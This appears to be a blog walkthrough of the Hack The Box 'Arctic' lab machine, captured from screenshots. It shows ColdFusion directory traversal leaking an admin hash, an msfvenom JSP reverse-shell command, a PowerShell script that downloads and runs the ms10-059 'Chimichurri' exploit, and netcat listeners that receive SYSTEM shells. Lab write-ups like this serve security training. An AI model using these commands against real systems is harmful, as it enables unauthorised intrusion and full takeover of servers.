{"id":63,"date":"2021-02-13T19:20:49","date_gmt":"2021-02-13T19:20:49","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=63"},"modified":"2021-02-13T19:30:12","modified_gmt":"2021-02-13T19:30:12","slug":"htb-arctic-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-arctic-walkthrough\/","title":{"rendered":"HTB &#8211; Arctic Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/4rRKqPP2x5AVEARgsW_UE1LuoESDt0nNBucBev1iIkGMHmI4qPn7J_4HLXpXlXew2VSeW8HpS23R9VyuOHSIH_Svab3McZglSEiWY7NPn5d-k_Kqt_y_ZGbuqFaCwVo39j33rGx0\" alt=\"Nmap scan report for 10.10. 10.11 \nHost is up (0.14s latency). \nNot shown: 997 filtered ports \nPORT \n135\/tcp \nSTATE SERVICE VERSION \nopen msrpc Microsoft Windows RPC \n8500\/tcp open fmtp? \n49154\/tcp open msrpc Microsoft Windows RPC \nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows \"\/><\/figure>\n\n\n\n<p>Port 8500 &#8211; ColdFusion<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/nS1CLzXhtcO3Cok8QhH8UnkBEJX4WN0iFhWsUYj1gNerlF1PMPQ41sqMkGetH6jm4qEcXeRElPCJ_oW2y_axBCNqevEYxyns7HDJjybYv1ru5auqgHmC5vMNW8otTvDNmbbG6Z9v\" alt=\"Index of\/ \n@ 10.10.10.11:8500 \nMost Visited O Getting Started OSCP a Pivot a PrivEsc ClientSide \nIndex of \/ \nCFIDE\/ \ncfdocs\/ \ndir \ndir \n03\/22\/17 08:52 \n03\/22\/17 08:55 \"\/><\/figure>\n\n\n\n<p>ColdFusion File Inclusion<\/p>\n\n\n\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/14641\">https:\/\/www.exploit-db.com\/exploits\/14641<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/KzPn9z9eJ19OHdtyxtgwPHLniRadrzdackrSAWRbmX5aNRnvXt-DRKsyDXNAnHBUwpll7woxxSdeaut_-tXDSup8pWi1XV7tUCWVKrafdh84NmraopiOCz34KYW1JSap79cZjaWv\" alt=\"ColdFusionAdministratc \nx \n#Wed X \nG) 4 10.10.10.11 \nAdobe ColdFusion - Dire X \nQ Search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide t Meterpreter a Web a DB \nexam \n*Wed Mar 22 EET 2017 \npassword=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 \nenc ted=true \nadmin \n*Wed Mar 22 EET 2017 \npassword=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 \nenc ted=true \n#Wed \nrdspass \npasswor \nencryptf \nMar 22 EET 2017 \naomoceceace \"\/><\/figure>\n\n\n\n<p>Hash Crack<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/llGufl1Koi-00Oc8Wkd1rPrT8RAyOW6RKD2Rd-lcwNShitXJi5jBEwYkhVgD37FbhzS74zg7KCgieWjBtg8t5FFMcRB3T8a5OagywTLeKtZLvRL7lKkV-6DylcTyM_oVEquRg_hJ\" alt=\"Possible Hashs: \n\u5196 + \u4e00 mySQL5 \n\u5196 SHA-I \nHASH: 2F635F6D20E3FDEOC53075A84868F807DCEC9803 \nSHA-1(SHA-1($pass)) \n\u4e00 37r00t6ka11 \u4e00 \u4e36 home \u4e36 kal sa \u4e36 TB \u4e36 arc hash-identifier \n\/ \u4e36 \nRoot@81ackp10it.com \nwww.81ackp101t.com \nBy Zlon3R \n\u4e36 VI . 1 \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/JzTs_KZ0BZKqaFw1zc8PIOVpwvM5Q0jbMTXWeE5p0297kGlD5zNYw-tzpWkPY1N9AjVwdJzhANSkpAgTpSb4CSDz36P6-3IFAJnKMyro1WTBBL5roPxwbxam2US8nRR7bpxVpQND\" alt=\"@ https:\/\/hashkiller.co.uk\/Cracker \nMost Visited o Getting Started a OSCP a Pivot a PrivEsc a ClientSide a Meterpreter E Web \nHashKiller \nHash Cracker \nList Manager \nCracker Result \nWe cracked 1 hashes leaving 0 left. \nCrack my Hashes \nUpload button disabled? We use Google reCAPTGHA v3. \nCracker Results: \nSHAI happyday \"\/><\/figure>\n\n\n\n<p>JSP Shell Creation &amp; File Upload &amp; Shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/3dmO24c-a4de1aMUS6h0vqR203asMFlE0iwY_5K_KfGXIF8qZI5k6ALAmWMiGLTv5CGmkCspLPghiFIxKSmNd4-7Jc24VmogMi_eiQn2WmT3XLWRzIedkKe-zSeUbVqTeEyUGWYL\" alt=\"msfvenom -p java\/jsp shell reverse tcp LHOST=10.10.14.10 LPORT=8888 -f raw &gt; shell.jsp \n'ayload size: 1497 bytes \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/kynAwluKP4lgJ7jYeKOQev8pXmyApfQR57udmi3dtl8kxahOFHewsyE2bJ9uhi5UJVGsQZhAXHPlYAmKp78CFUsFjzai9iMoDdtGllcGhwelOG06UFbVSFhl2DXeqhInSV6Fwu-C\" alt=\"5 \nG) 4 10.10.10.11 \n:8500\/CFlDE\/administrator\/index.cfm \nQ Search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide a Meterpreter a Web a DB \nCF ADOBE* COLDFUSION' ADMINISTRATOR \nexam \nIll \\ \n\u2022e \ni \nQ \nLOGOUT \nExpand All X Collapse All \nSERVER SETTINGS \nSettings \nRequest Tuning \nCaching \nClient Variables \nMemoiY Variables \nMappings \nMail \nChalting \nFont Management \nJava and JVM \nSettings SummalY \nDATA &amp; SERVICES \nData Sources \nVerity Collections \nVerity K2 Sewer \nWeb Sewices \nFlex Integration \nDEBUGGING &amp; LOGGING \nDebug Output Settings \nDebugging IP Addresses \nDebugger Settings \nLogging Settings \nLog Files \nScheduled Tasks \nSystem Probes \nCode Analyzer \nLicense Scanner \nSERVER MONITORING \nEXTENSIONS \nEVENT GATE-NYS \nSECURITY \nDebugging &amp; Logging &gt; Add\/Edit Scheduled Task \nAdd\/Edit Scheduled Task \nTask Name \nDuration \nFrequency \nURL \nUser Name \nPassword \nTimeout (sec) \nProxy Server \nPublish \nFile \nshell \nStart Date 21 2019 \nO \nO \nRecurring \nDaily every \nDaily \nHours \nStan Time \nv \nEnd Date (optional) \nat \nMinutes \nSeconds \nEnd Time \nhttp:\/\/10.10.14.10:8000\/shell.jsp \n: Port \nSave output to a file \nion8\\wwwroot\\CFlDE\\shell.jsp \nResolve URL \nResolve Internal URLs so that links reman Intact \nSubmit Cancel \"\/><\/figure>\n\n\n\n<p>Run the task and open the file on the following directory<\/p>\n\n\n\n<p>C:\\ColdFusion8\\wwwroot\\CFIDE\\shell.jsp<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/_j8nG9OPIPZSrSaAPjRDLMxp-FaSArO9IcAET1ZNpn8v6ASrmX-XkKc3rpfbN3xBXB2yllSeST5fYOsK1rRO5c_YmqnQGCE0awh8CNW_czXnGwIWjWhj6YgCkSu8ipXPQYrpHXFH\" alt=\"Debugging &amp; Logging &gt; Scheduled Tasks \nScheduled tasks can create static web pages from dynamic data sources. You can also schedule tasks to update Verity searches and to create repolts \nSchedule New Task \nScheduled Tasks \nActions \nTask Name \n@ o a @ shell \nDuration \n21 Mai 2019 \nInterval \nOne-time at 1:45 \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/FZKmnhA6aM1lcnEeA8xgoZrLiN5K8kE2EV1NKpN-hdJUECKW-zTw6nQ132liKHN8lP_uFytdBwz0QCpQriDZ0m3KNt5l4rPybAIfH0CnWB2WMFkKBDcWRPmSxSBxhmFws-Tmy4Vq\" alt=\"nc -nlvp 8888 \nlistening on [any] 8888 \nconnect to [10.10. 14.10] from (UNKNOWN} [10.10.10.11] \nMicrosoft Windows [Version 6.1.7600] \nCopyright (c) 2009 Microsoft Corporation. All \nrights \nColdFusionAdministratc X 10.10.10.11:8500\/CFlDE\/sm X \n@ 10.10.10.11:8500\/CFlDE\/shell.jsp \n49419 \nreserved. \nroot@kali: home\/kalisa\/H \nMozilla Firefox \n\u2022e Q search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide EMeterpreter a Web a DB texam \"\/><\/figure>\n\n\n\n<p>Privilege escalation<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/e-petBrSQIEv8f65KNAHgyvNRUwOV7nKEEHgF63mI4P9x98w4U_OWY9vkHt3lGRWc4Prer6sGo0JK-0jT-Yy09osdXNE4IoYbnIBsOjcs0iXi-rtscPkEnA3FUmonAWToJCV4w4M\" alt=\"systeminfo \nHost Name: \nOS Name: \nOS Version: \nOS manufacturer: \nOS Configuration: \nOS Build Type: \nRegistered Owner: \nRegistered Organization: \nProduct ID: \nOriginal Install Date: \nSystem Boot Time: \nSystem manufacturer: \nSystem model: \nSystem Type: \nProcessor(s): \nBIOS Version: \nWindows Directory: \nSystem Directory: \nBoot Device: \nSystem Locale: \nInput Locale: \nTime Zone: \nTotal Physical memory: \nAvailable Physical memory: \nVirtual memory: max Size: \nVirtual memory: Available: \nVirtual memory: In Use: \nPage File Location(s): \nDomain: \nLogon Server: \nHotfix(s): \nNetwork Card(s): \nARCTIC \nMicrosoft Windows Server 2008 R2 Standard \n6.1.7600 N\/A Build 7600 \nMicrosoft Corporation \nStandalone Server \nmultiprocessor Free \nWindows User \n55041-507-9857321-84451 \n22\/3\/2017, \n21\/5\/2019, \nVPlware, Inc. \nVPlware Virtual Platform \nx64-based PC \n2 Processor(s) Installed. \n[01]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel \n[02]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel \n-2594 Mhz \n-2594 Mhz \nPhoenix Technologies LTD 6.00, \nC : \\Windows \nel; Greek \nen-us;English (United States) \n(UT CA-02:00) Athens, Bucharest, \n5\/4\/2016 \nIstanbul \n1.024 ma \n208 ma \n2.048 ma \n1.156 ma \n892 \nC: \\pagefile.sys \nN\/A \nN\/A \n1 NIC(s) Installed. \n[01]: Intel (R) PRO\/IOOO \nPIT Network Connection \"\/><\/figure>\n\n\n\n<p>Python exploit suggester<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/d7Zd5vi7geOq2KIvfKU-2gwghlgaQgeY5ac9CApv9qYCWrfzunIlC13AImDjrkJnMpzKWUNiwen7YCCllZWk3mNDnnU6rAaUO5dbOQBKQPpLFQuMaZyf3BlPv7rgaP1ftUd5wptV\" alt=\"python \n[ initiating winsploit version 3.3... \n[+1 writing to file 2019-05-19-mssb.xls \n[ done \nPIS11-011: \nms10-073: \nms10-061: \nms10-059: \nms10-047: \nms10-002: \nPIS09-072: \n. \/windows-exploit-suggester.py \n- -update \n-systeminfo systeminfo \npython windows-exploit-suggester.py \ninitiating winsploit version 3.3... \ndatabase file detected as xls or xlsx based on extension \nattempting to read from the systeminfo input file \nsysteminfo input file read successfully (utf-8) \nquerying database file for potential vulnerabilities \n-database 2019-05-19-mssb.xls \n[+1 \n[+1 \n[+1 \ncomparing the O hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits \nthere are now 197 remaining vulns \n[E] exploitdb POC, [PI] metasploit module, [ * ] missing bulletin \nwindows version identified as 'Windows 2008 R2 64-bit' \nPIS13-009: Cumulative Security Update for Internet Explorer (2792100) \nCritical \nPIS13-005: Vulnerability in Windows Kernel-mode Driver Could Allow Elevation of Privilege (2778930) \nImportant \nPIS12-037: Cumulative Security Update for Internet Explorer (2699988) \nCritical \nhttp \/\/www. exploit-db . com\/exploits\/35273\/ \nInternet Explorer 8 \nFixed col span ID Full ASLR, DEP &amp; EMET 5. , \nPOC \nhttp \/\/www. exploit-db . com\/exploits\/34815\/ \nInternet Explorer 8 \nFixed col span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (ms12-037), \nVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) \nImportant \nVulnerabilities in Windows Kernel-mode Drivers Could Allow Elevation of Privilege (981957) \nImportant \nVulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) \nCritical \nVulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) \nImportant \nVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) \nImportant \nCumulative Security Update for Internet Explorer (978207) \nCritical \nCumulative Security Update for Internet Explorer (976325) \nCritical \ndone \nPOC \"\/><\/figure>\n\n\n\n<p>Upload ms10-059.exe (Chimchurri) via Powershell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ZbRCrTbzS3jTzeehQDoxG2m8MMW2BNry6o89Rzz359gxIEmu5V0f9A0rm1jYIN7jLIck79iISBLhLTvpjv-IZ0ENpCuDtcaS6hPCnsmxKRnpE2bw5_yiFl4n2dB92K3cRCIlDYJp\" alt=\"Applications \nPlaces \nTerminator \nSun 10:50 \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/mnt\/hgfs\/Kali-Shared \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/home\/kalisa\/HTB\/arctic \ne \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/home\/kalisa\/HTB 158x34 \n18\/03\/2008 \n22\/03\/2017 \n18\/03\/2008 \n18\/03\/2008 \n12:11 \n09:53 \n12:11 \n12:11 \n17 File(s) \n64.512 wsconfig.exe \n1.013 wsconfig_jvm.config \n64.512 wsd12java.exe \n64.512 xmlscript.exe \n3.339.263 bytes \n2 Dir(s) 33.180. 127.232 bytes free \n$storageDir \n$pwd &gt; wget.psl \necho $storageDir \n$pwd &gt; wget.psl \n$webclient \nNew-Object System.Net.WebClient &gt;&gt;wget.psl \necho $webclient \nNew-Object System.Net.WebClient \n$url \n&quot;http:\/\/10. \necho $url \n\/\/10. 10 . 14 . 10 8000\/ms10-059. exe&quot; \n$file \n\u2022vms10-059. \necho $file \n&quot;PlSIO-059.exe&quot; &gt;&gt;wget.psl \n. PSI \n10.14.10:8000\/ms10-059.exe&quot; \n. PSI \nPSI \n&gt;&gt;wget.psl \necho &gt;&gt;wget.psl \n-ExecutionPolicy Bypass -NoLogo \npower shell. exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile \n-Nonlnteractive \n-File wget.psl \n-NoProfile \n-File wget.psl \ndir \nVolume in drive C has no label. \nVolume Serial Number is F88F-4EA5 \nDirectory of \n21\/05\/2019 01:52 \nroot@kali: \/home\/kalisa\/HTB\/arctic 158x8 \nIs \ncoldfusion-login coldfusion.py hash msf . exe nmap.gnmap nmap.nmap nmap.xml power shell shell.jsp \nroot@kati : \/home\/kaIisa\/HTB\/arctic# \nserving HTTP on O.O.O.O port 8000 \npython -m SimpleHTTPServer \n10.10. 10.11 \n10.10. 10.11 \n10.10. 10.11 \n[19\/may\/2019 \n[19\/may\/2019 10:40. \n\u202248] \n[19\/may\/2019 \n&quot;GET \/shell.jsp HTTP\/I.I&quot; \n200 \n&quot;GET \/shell.jsp HTTP\/I.I&quot; \n200 \n&quot;GET \/ms10-059.exe HTTP\/I.I&quot; 200 \"\/><\/figure>\n\n\n\n<p>Get an admin shell with exe file<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/TfPhiNd36xZSa18e2xR-Zck5JCmqY4V1u0Nn5Jtf0IpUxKjQxEiowOOWQjS4NsNwLQqAVUpkJC3unn6xO8viqBk6l5jOLdKNdTy_7ebg06_vuGDfGVZvvlWIAaPLTRMiMI6SRdz_\" alt=\"19\/01\/2008 \n18\/03\/2008 \n64.512 \n18\/03\/2008 \n71.680 \n18\/03\/2008 \n18\/03\/2008 \n64.512 \n22\/03\/2017 \n18\/03\/2008 \n64.512 \n21\/05\/2019 \n784.384 \n18\/03\/2008 \n34.816 \n18\/03\/2008 \n64.512 \n21\/05\/2019 \n21\/05\/2019 \n18\/03\/2008 \n78.848 \n18\/03\/2008 \n64.512 \n22\/03\/2017 \n18\/03\/2008 \n64.512 \n18\/03\/2008 \n64.512 \n10. \n12. \n.11 \n12. \n12. \n.11 \n12. \n09. \n.53 \n12. \n02. \n.04 \n12. \n12. \n.11 \n02. \n01. \n.50 \n12. \n12. \n.11 \n09. \n12. \n.11 \n12. \n18 File(s) \n2. 629.632 \n5.120 \n1.804 \n179 \n112 \n1.013 \nj ikes.exe \nj run. exe \nj runsvc. exe \nj runsvcmsg.dll \njspc.exe \njvm.config \nmigrate exe \nms10-059.exe \nportscan.dll \nsniffer . exe \nwget.psl \nwget . pslpowershell. exe \nWindowsLogin . dll \nwsconfig. exe \nwsconfig_j vm . config \nwsd12j ava . exe \nxmlscript. exe \n2 Dir(s) 33.182. \nC : 10 \nms10-059.exe 10.10.14.10 6666 \n\/ Chimichurri\/--&gt;This exploit gives you a Local System shell <8R&gt;\/Chimichurri\/--&gt;Changing registry \nvalues.. .<8R&gt;\/Chimichurri\/--&gt;Got SYSTEM token.. .<8R&gt;\/Chimichurri\/--&gt;Running reverse shell.. \n\/ Chimichurri\/--&gt;Restoring default registry values.. \nroot@kali: \/home\/kalisa\/HTB\/arctic 96x15 \nnc -nlvp 6666 \nlistening on [any] 6666 \nconnect to [10.10. 14.10] from (UNKNOWN) [10.10. 10.11] 49535 \nMicrosoft Windows [Version 6.1.7600] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. \nwhoami \nnt authority\\system \n4. 123.684 bytes \n519.296 bytes free \n-059. exe 10.10. 14.10 6666 \"\/><\/figure>\n\n\n\n<p>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>nmap Port 8500 &#8211; ColdFusion ColdFusion File Inclusion https:\/\/www.exploit-db.com\/exploits\/14641 Hash Crack JSP Shell Creation &amp; File Upload &amp; Shell Run the task and open the file on the following directory C:\\ColdFusion8\\wwwroot\\CFIDE\\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimchurri) via Powershell Get an admin shell with exe file .<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=63"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63\/revisions"}],"predecessor-version":[{"id":64,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63\/revisions\/64"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=63"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=63"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=63"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}